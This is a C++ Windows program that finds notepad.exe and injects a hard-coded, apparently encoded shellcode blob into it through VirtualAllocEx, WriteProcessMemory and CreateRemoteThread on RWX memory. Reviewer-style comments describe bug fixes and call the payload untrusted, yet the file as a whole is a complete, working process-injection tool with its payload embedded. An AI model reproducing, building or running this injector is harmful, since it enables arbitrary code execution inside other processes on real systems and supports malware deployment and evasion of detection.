# include <iostream>
# include <windows.h>
# include <TlHelp32.h>
using namespace std;
// Opaque byte blob handed to LoadShellcode() below, where it is copied into
// another process and executed as-is. Nothing in this file says what these
// bytes do, so treat them as untrusted code: inspect them (or replace them
// with a known, lab-only payload) before building or running this in any
// environment you care about. Because it is a string literal, sizeof(buf)
// is one byte larger than the payload (the trailing NUL).
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xdd\xff\xff\xff\x48\x8d\x05\xef"
"\xff\xff\xff\x48\xbb\xd3\x63\xf0\x5c\xa2\xa7\x72\x95\x48"
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x2f\x2b\x73"
"\xb8\x52\x4f\xb2\x95\xd3\x63\xb1\x0d\xe3\xf7\x20\xc4\x85"
"\x2b\xc1\x8e\xc7\xef\xf9\xc7\xb3\x2b\x7b\x0e\xba\xef\xf9"
"\xc7\xf3\x2b\x7b\x2e\xf2\xef\x7d\x22\x99\x29\xbd\x6d\x6b"
"\xef\x43\x55\x7f\x5f\x91\x20\xa0\x8b\x52\xd4\x12\xaa\xfd"
"\x1d\xa3\x66\x90\x78\x81\x22\xa1\x14\x29\xf5\x52\x1e\x91"
"\x5f\xb8\x5d\x72\x2c\xf2\x1d\xd3\x63\xf0\x14\x27\x67\x06"
"\xf2\x9b\x62\x20\x0c\x29\xef\x6a\xd1\x58\x23\xd0\x15\xa3"
"\x77\x91\xc3\x9b\x9c\x39\x1d\x29\x93\xfa\xdd\xd2\xb5\xbd"
"\x6d\x6b\xef\x43\x55\x7f\x22\x31\x95\xaf\xe6\x73\x54\xeb"
"\x83\x85\xad\xee\xa4\x3e\xb1\xdb\x26\xc9\x8d\xd7\x7f\x2a"
"\xd1\x58\x23\xd4\x15\xa3\x77\x14\xd4\x58\x6f\xb8\x18\x29"
"\xe7\x6e\xdc\xd2\xb3\xb1\xd7\xa6\x2f\x3a\x94\x03\x22\xa8"
"\x1d\xfa\xf9\x2b\xcf\x92\x3b\xb1\x05\xe3\xfd\x3a\x16\x3f"
"\x43\xb1\x0e\x5d\x47\x2a\xd4\x8a\x39\xb8\xd7\xb0\x4e\x25"
"\x6a\x2c\x9c\xad\x14\x18\xa6\x72\x95\xd3\x63\xf0\x5c\xa2"
"\xef\xff\x18\xd2\x62\xf0\x5c\xe3\x1d\x43\x1e\xbc\xe4\x0f"
"\x89\x19\x57\xc7\x37\x85\x22\x4a\xfa\x37\x1a\xef\x6a\x06"
"\x2b\x73\x98\x8a\x9b\x74\xe9\xd9\xe3\x0b\xbc\xd7\xa2\xc9"
"\xd2\xc0\x11\x9f\x36\xa2\xfe\x33\x1c\x09\x9c\x25\x3f\xc3"
"\xcb\x11\xbb\xb6\x1b\x95\x5c\xa2\xa7\x72\x95";
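// Return the PID of the first running process whose image name equals
// `targetProcess` exactly (case-sensitive wcscmp), or 0 when nothing matches,
// the snapshot cannot be taken, or `targetProcess` is null. PID 0 is never a
// usable injection target, so callers can treat 0 as "not found".
//
// The explicit W variants of the Toolhelp API are used so that the wide
// string comparison compiles whether or not UNICODE is defined (the original
// relied on the TCHAR mapping and only built under UNICODE).
DWORD EnumerateProcess(const wchar_t* targetProcess)
{
    DWORD targetProcessID = 0;
    if (targetProcess == nullptr) {
        return targetProcessID;
    }

    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        // Nothing to release: INVALID_HANDLE_VALUE must not reach CloseHandle
        // (the original closed it unconditionally).
        return targetProcessID;
    }

    PROCESSENTRY32W entry = {};
    entry.dwSize = sizeof(entry);   // Process32FirstW rejects the call otherwise
    if (Process32FirstW(snapshot, &entry)) {
        do {
            if (wcscmp(targetProcess, entry.szExeFile) == 0) {
                targetProcessID = entry.th32ProcessID;
                break;
            }
        } while (Process32NextW(snapshot, &entry));
    }

    CloseHandle(snapshot);
    return targetProcessID;
}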
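// Copy `sc_size` bytes starting at `shellcode` into the process identified by
// `pid`, run them there on a new thread, and block until that thread exits.
//
// `shellcode` is declared LPVOID* but is only ever used as the source address
// of the copy; the caller in this file passes the address of a byte array.
//
// Returns TRUE when the remote thread was created and has finished, FALSE on
// any failure (open, remote allocation, write, or thread creation). The
// original returned EXIT_SUCCESS/EXIT_FAILURE through a BOOL, i.e. 0 meant
// success and OpenProcess failure was reported as success; the value is now a
// real BOOL. The only caller in this file ignores the result.
//
// Fixes relative to the original: the process handle is always closed (it
// leaked on every failure path), and VirtualFreeEx is called with the process
// handle rather than the thread handle, which was NULL in that branch.
BOOL LoadShellcode(DWORD pid, LPVOID *shellcode, DWORD sc_size)
{
    if (shellcode == nullptr || sc_size == 0) {
        return FALSE;
    }

    // Least privilege: request only the rights VirtualAllocEx /
    // WriteProcessMemory / CreateRemoteThread document as required, not
    // PROCESS_ALL_ACCESS, and do not make the handle inheritable.
    const DWORD access = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                         PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
    HANDLE pHandle = OpenProcess(access, FALSE, pid);
    if (pHandle == NULL) {
        return FALSE;
    }

    BOOL ok = FALSE;
    HANDLE tHandle = NULL;
    // One RWX region, as in the original. Writable+executable memory is a
    // well-known indicator; it is kept here to preserve behaviour, not endorsed.
    LPVOID rBuffer = VirtualAllocEx(pHandle, NULL, sc_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (rBuffer != NULL) {
        if (WriteProcessMemory(pHandle, rBuffer, shellcode, sc_size, NULL)) {
            tHandle = CreateRemoteThread(pHandle, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, NULL);
        }

        if (tHandle != NULL) {
            // Blocks for as long as the remote thread runs; code that never
            // returns will hang the caller here, exactly as before.
            WaitForSingleObject(tHandle, INFINITE);
            CloseHandle(tHandle);
            ok = TRUE;
            // The remote region is deliberately left mapped on success, as in
            // the original: nothing here can tell whether the code that ran
            // left anything behind that still references it.
        } else {
            VirtualFreeEx(pHandle, rBuffer, 0, MEM_RELEASE);
        }
    }

    CloseHandle(pHandle);
    return ok;
}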
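// Entry point: look up the hard-coded target process and inject `buf` into
// it. Command-line arguments are accepted but unused; the target name is
// fixed in the source.
//
// Returns 1 when no matching process is running. The original fell through
// to LoadShellcode with pid 0, whose OpenProcess call fails, so nothing
// happened and nothing was reported. Returns 0 otherwise; LoadShellcode's
// own result is not inspected.
int main(int argc, char* argv[])
{
    (void)argc;
    (void)argv;

    const wchar_t *targetProcess = L"notepad.exe";
    DWORD pid = EnumerateProcess(targetProcess);
    if (pid == 0) {
        cerr << "target process not found\n";
        return 1;
    }

    // sizeof(buf) counts the string literal's trailing NUL, so one extra zero
    // byte is allocated and copied along with the payload, as before.
    LoadShellcode(pid, (LPVOID *)&buf, sizeof(buf));
    return 0;
}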